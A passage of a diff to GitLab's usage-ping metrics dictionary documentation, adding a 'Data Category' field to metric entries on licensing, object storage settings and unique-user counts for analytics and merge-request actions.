Status: `data_available` Tiers: `premium`, `ultimate` @@ -7266,6 +8624,8 @@ Whether this is a trial license or not Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7278,6 +8638,8 @@ Date the trial license ends on Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7290,6 +8652,8 @@ The number of seats included in the license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7302,6 +8666,8 @@ Company on the GitLab license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7314,6 +8680,8 @@ Email on the GitLab license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7326,6 +8694,8 @@ Name on the GitLab license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7338,6 +8708,8 @@ The value of the SMTP server that is used Group: `group::activation` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7350,6 +8722,8 @@ Whether Mattermost is enabled Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7362,6 +8736,8 @@ Whether Object Storage is enabled for Artifacts Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7374,6 +8750,8 @@ Whether Background Upload for Object Storage is enabled for Artifacts Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7386,6 +8764,8 @@ Whether Direct Upload for Object Storage is enabled for Artifacts Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7398,6 +8778,8 @@ Whether Object Storage is enabled for Artifacts Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7410,6 +8792,8 @@ What Object Storage provider has been configured for Artifacts Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7422,6 +8806,8 @@ Whether Object Storage is enabled for External Diffs Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7434,6 +8820,8 @@ Whether Background Upload for Object Storage is enabled for External Diffs Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7446,6 +8834,8 @@ Whether Direct Upload for Object Storage is enabled for External Diffs Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7458,6 +8848,8 @@ Whether Object Storage is enabled for External Diffs Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7470,6 +8862,8 @@ What Object Storage provider has been configured for External Diffs Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7482,6 +8876,8 @@ Whether Object Storage is enabled for LFS Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7494,6 +8890,8 @@ Whether Background Upload for Object Storage is enabled for LFS Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7506,6 +8904,8 @@ Whether Direct Upload for Object Storage is enabled for LFS Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7518,6 +8918,8 @@ Whether Object Storage is enabled for LFS Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7530,6 +8932,8 @@ What Object Storage provider has been configured for LFS Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7542,6 +8946,8 @@ Whether Object Storage is enabled for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7554,6 +8960,8 @@ Whether Background Upload for Object Storage is enabled for Packages Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7566,6 +8974,8 @@ Whether Direct Upload for Object Storage is enabled for Packages Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7578,6 +8988,8 @@ Whether Object Storage is enabled for Packages Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7590,6 +9002,8 @@ What Object Storage provider has been configured for Packages Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7602,6 +9016,8 @@ Whether Object Storage is enabled for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7614,6 +9030,8 @@ Whether Background Upload for Object Storage is enabled for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7626,6 +9044,8 @@ Whether Direct Upload for Object Storage is enabled for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7638,6 +9058,8 @@ Whether Object Storage is enabled for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7650,6 +9072,8 @@ What Object Storage provider has been configured for Uploads Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7662,6 +9086,8 @@ Whether OmniAuth is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7674,6 +9100,8 @@ Whether the bundled Prometheus is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7686,6 +9114,8 @@ Whether Prometheus Metrics endpoint is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7698,6 +9128,8 @@ When the Usage Ping computation was started Group: `group::product intelligence` +Data Category: `Standard` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7710,6 +9142,8 @@ When the core features were computed Group: `group::product intelligence` +Data Category: `Standard` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7722,6 +9156,8 @@ When the EE-specific features were computed Group: `group::product intelligence` +Data Category: `Standard` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7734,6 +9170,8 @@ The number of unique users who visited any analytics feature by month Group: `group::optimize` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -7746,6 +9184,8 @@ The number of unique users who visited any analytics feature by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7758,6 +9198,8 @@ Unique visitors to /groups/:group/-/contribution_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7770,6 +9212,8 @@ Unique visitors to /groups/:group/-/contribution_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7782,6 +9226,8 @@ Unique visitors to /groups/:group/-/insights/ by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7794,6 +9240,8 @@ Unique visitors to /groups/:group/-/insights/ by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7806,6 +9254,8 @@ Unique visitors to /groups/:group/-/issues_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7818,6 +9268,8 @@ Unique visitors to /groups/:group/-/issues_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7830,6 +9282,8 @@ Missing description Group: `group::optimize` +Data Category: `Optional` + Status: `removed` Tiers: `free` @@ -7842,6 +9296,8 @@ Missing description Group: `group::optimize` +Data Category: `Optional` + Status: `removed` Tiers: @@ -7854,6 +9310,8 @@ Unique visitors to /groups/:group/-/analytics/productivity_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7866,6 +9324,8 @@ Unique visitors to /groups/:group/-/analytics/productivity_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7878,6 +9338,8 @@ Unique visitors to /groups/:group/-/analytics/value_stream_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7890,6 +9352,8 @@ Unique visitors to /groups/:group/-/analytics/value_stream_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7902,6 +9366,8 @@ Missing description Group: `group::utilization` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7914,6 +9380,8 @@ Missing description Group: `group::utilization` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7926,6 +9394,8 @@ Counts visits to DevOps Adoption page per month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7938,6 +9408,8 @@ Counts visits to DevOps Adoption page per week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7950,6 +9422,8 @@ Unique visitors to /admin/dev_ops_report by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7962,6 +9436,8 @@ Unique visitors to /admin/dev_ops_report by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7974,6 +9450,8 @@ Unique visitors to /admin/usage_trends by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7986,6 +9464,8 @@ Unique visitors to /admin/usage_trends by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -7998,6 +9478,8 @@ Unique visitors to /:group/:project/-/analytics/code_reviews by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8010,6 +9492,8 @@ Unique visitors to /:group/:project/-/analytics/code_reviews by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8022,6 +9506,8 @@ Unique visitors to /:group/:project/insights/ by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8034,6 +9520,8 @@ Unique visitors to /:group/:project/insights/ by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8046,6 +9534,8 @@ Unique visitors to /:group/:project/-/analytics/issues_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8058,6 +9548,8 @@ Unique visitors to /:group/:project/-/analytics/issues_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8070,6 +9562,8 @@ Unique visitors to /:group/:project/-/analytics/merge_request_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8082,6 +9576,8 @@ Unique visitors to /:group/:project/-/analytics/merge_request_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8094,6 +9590,8 @@ Unique visitors to /groups/:group/-/analytics/ci_cd by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8106,6 +9604,8 @@ Unique visitors to /groups/:group/-/analytics/ci_cd by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8118,6 +9618,8 @@ Unique visitors to /:group/:project/-/graphs/master/charts by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8130,6 +9632,8 @@ Unique visitors to /:group/:project/-/graphs/master/charts by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8142,6 +9646,8 @@ Unique visitors to /:group/:project/-/value_stream_analytics by month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8154,6 +9660,8 @@ Unique visitors to /:group/:project/-/value_stream_analytics by week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8166,6 +9674,8 @@ Counts visits to DevOps Adoption page per month Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -8178,6 +9688,8 @@ Counts visits to DevOps Adoption page per week Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -8190,6 +9702,8 @@ Monthly active users creating pipelines that that have the Vault JWT with it.' Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -8202,6 +9716,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8214,6 +9730,8 @@ Total count of pipelines runs Group: `group::configure` +Data Category: `Optional` + Status: `broken` Tiers: `free`, `premium`, `ultimate` @@ -8226,6 +9744,8 @@ Total count of pipelines runs Group: `group::configure` +Data Category: `Optional` + Status: `broken` Tiers: `free`, `premium`, `ultimate` @@ -8238,6 +9758,8 @@ Number of projects using 5 min production app CI template in last 7 days. Group: `group::5-min-app` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8250,6 +9772,8 @@ Number of projects using 5 min production app CI template in last 7 days. Group: `group::5-min-app` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8262,6 +9786,8 @@ Count of pipelines using the Auto Build template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8274,6 +9800,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8286,6 +9814,8 @@ Count of pipelines using the latest Auto Deploy template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8298,6 +9828,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8310,6 +9842,8 @@ Count of pipelines using the stable Auto Deploy template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8322,6 +9856,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8334,6 +9870,8 @@ Count of pipelines using the Auto DevOps template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8346,6 +9884,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8358,6 +9898,8 @@ Count of projects using `AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml` template Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8370,6 +9912,8 @@ Count of projects using `AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml` template Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8382,6 +9926,8 @@ Count of projects using `AWS/Deploy-ECS.gitlab-ci.yml` template in last 28 days. Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8394,6 +9940,8 @@ Count of projects using `AWS/Deploy-ECS.gitlab-ci.yml` template in last 7 days. Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8406,6 +9954,8 @@ Count of pipelines with implicit Auto Build runs Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8418,6 +9968,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8430,6 +9982,8 @@ Count of pipelines with implicit Auto Deploy runs Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8442,6 +9996,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8454,6 +10010,8 @@ Count of pipelines with implicit Auto DevOps runs Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8466,6 +10024,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8478,6 +10038,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8490,6 +10052,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8502,6 +10066,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8514,6 +10080,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8526,6 +10094,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8538,6 +10108,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8550,6 +10122,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -8562,6 +10136,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8574,6 +10150,8 @@ Count of pipelines that include the terraform base template from GitLab Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8586,6 +10164,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -8598,6 +10178,8 @@ Count of unique users per month who interact with a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8610,6 +10192,8 @@ Count of unique users per week who interact with a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8622,6 +10206,8 @@ Count of users clicking diff view setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8634,6 +10220,8 @@ Count of users clicking diff view setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8646,6 +10234,8 @@ Count of users clicking merge request file browser setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8658,6 +10248,8 @@ Count of users with merge request file list setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8670,6 +10262,8 @@ Count of users clicking single file mode setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8682,6 +10276,8 @@ Count of users clicking single file mode setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8694,6 +10290,8 @@ Count of users clicking merge request whitespae setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8706,6 +10304,8 @@ Count of users clicking merge request whitespae setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8718,6 +10318,8 @@ Count of users with show whitespace disabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8730,6 +10332,8 @@ Count of users with show whitespace disabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8742,6 +10346,8 @@ Count of users with single mode disabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8754,6 +10360,8 @@ Count of users with single mode disabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8766,6 +10374,8 @@ Count of users with show whitespace enabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8778,6 +10388,8 @@ Count of users with show whitespace enabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8790,6 +10402,8 @@ Count of users with single file mode enabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8802,6 +10416,8 @@ Count of users with single file mode enabled Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8814,6 +10430,8 @@ Count of users with merge request view type as inline Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8826,6 +10444,8 @@ Count of users with merge request view type as inline Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8838,6 +10458,8 @@ Count of users with merge request view type as parallel Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8850,6 +10472,8 @@ Count of users with merge request view type as parallel Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8862,6 +10486,8 @@ Count of unique users per month who edit the description of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8874,6 +10500,8 @@ Count of unique users per week who edit the description of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8886,6 +10514,8 @@ Count of unique users per month who edit the title of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8898,6 +10528,8 @@ Count of unique users per week who edit the title of a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8910,6 +10542,8 @@ Count of users with merge request file list setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8922,6 +10556,8 @@ Count of users with merge request file list setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8934,6 +10570,8 @@ Count of users with merge request file tree setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8946,6 +10584,8 @@ Count of users with merge request file tree setting Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8958,6 +10598,8 @@ Count of unique merge requests per month with diffs viewed Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8970,6 +10612,8 @@ Count of unique merge requests per week with diffs viewed Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8982,6 +10626,8 @@ Count of unique merge requests per month with diffs viewed file by file Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -8994,6 +10640,8 @@ Count of unique merge requests per week with diffs viewed file by file Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9006,6 +10654,8 @@ Count of unique users per month who added a suggestion Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9018,6 +10668,8 @@ Count of unique users per week who added a suggestion Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9030,6 +10682,8 @@ Count of unique users per month who applied a suggestion Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9042,6 +10696,8 @@ Count of unique users per week who applied a suggestion Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9054,6 +10710,8 @@ Count of unique users per month who add an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9066,6 +10724,8 @@ Count of unique users per week who add an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9078,6 +10738,8 @@ Count of unique users per month who delete an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9090,6 +10752,8 @@ Count of unique users per week who delete an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9102,6 +10766,8 @@ Count of unique users per month who delete an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9114,6 +10780,8 @@ Count of unique users per week who edit an approval rule to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9126,6 +10794,8 @@ Count of unique users per month who approve a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9138,6 +10808,8 @@ Count of unique users per week who approve a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9150,6 +10822,8 @@ Count of unique users per month who are assigned to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9162,6 +10836,8 @@ Count of unique users per week who are assigned to a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9174,6 +10850,8 @@ Count of unique users per month who changed assignees of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9186,6 +10864,8 @@ Count of unique users per week who changed assignees of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9198,6 +10878,8 @@ Count of unique users per month who closed a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9210,6 +10892,8 @@ Count of unique users per week who closed a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9222,6 +10906,8 @@ Count of unique users per month who commented on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9234,6 +10920,8 @@ Count of unique users per week who commented on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9246,6 +10934,8 @@ Count of unique users per month who create a merge request from an issue Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9258,6 +10948,8 @@ Count of unique users per week who create a merge request from an issue Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9270,6 +10962,8 @@ Count of unique users per month who created a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9282,6 +10976,8 @@ Count of unique users per week who created a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9294,6 +10990,8 @@ Count of unique users per month who create a multiline comment in a merge reques Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9306,6 +11004,8 @@ Count of unique users per week who create a multiline comment in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9318,6 +11018,8 @@ Count of unique users per month who create a note as part of a merge request rev Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9330,6 +11032,8 @@ Count of unique users per week who create a note as part of a merge request revi Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9342,6 +11046,8 @@ Count of unique users per month who edited a comment on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9354,6 +11060,8 @@ Count of unique users per week who edited a comment on a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9366,6 +11074,8 @@ Count of unique users per week who edit a multiline comment in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9378,6 +11088,8 @@ Count of unique users per week who edit a multiline comment in a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9390,6 +11102,8 @@ Count of unique users per month who changed labels of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9402,6 +11116,8 @@ Count of unique users per week who changed labels of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9414,6 +11130,8 @@ Count of unique users per week who load the conflict resolution page Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9426,6 +11144,8 @@ Count of unique users per week who load the conflict resolution page Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9438,6 +11158,8 @@ Count of unique users per month who mark a merge request as a draft Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9450,6 +11172,8 @@ Count of unique users per week who mark a merge request as a draft Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9462,6 +11186,8 @@ Count of unique users per month who merged a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9474,6 +11200,8 @@ Count of unique users per week who merged a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9486,6 +11214,8 @@ Count of unique users per month who changed milestone of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9498,6 +11228,8 @@ Count of unique users per week who changed milestone of a MR Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -9510,6 +11242,8 @@ Count of unique users per month who locked a MR Group: `group::code 